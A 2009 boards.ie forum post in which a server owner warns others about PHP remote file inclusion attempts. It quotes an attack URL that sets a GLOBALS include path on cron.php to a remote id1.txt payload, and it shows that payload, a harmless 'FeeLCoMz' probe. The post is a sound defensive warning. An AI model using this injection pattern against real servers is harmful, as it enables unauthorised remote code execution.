If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)

Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

id1.txt PHP RFI - Fx29ID

biko · 2009-11-03 11:59:15

Little hackers have been trying to get at my servers a while now, using a PHP file inclusion exploit. For some reason they always use the same name on the payload file - id1.txt In this instance they've tried to append to a URL on my server…

03-11-2009 12:59pm

#1

biko

Registered Users, Registered Users 2 Posts: 81,220 ✭✭✭✭

Join Date: July 2005

Posts: 75622

Little hackers have been trying to get at my servers a while now, using a PHP file inclusion exploit. For some reason they always use the same name on the payload file - id1.txt

In this instance they've tried to append to a URL on my server ****/cron.php?GLOBALS[AA_INC_PATH]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt???
File content is
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

More info here

Could be worth having a look through your servers for id1.txt

1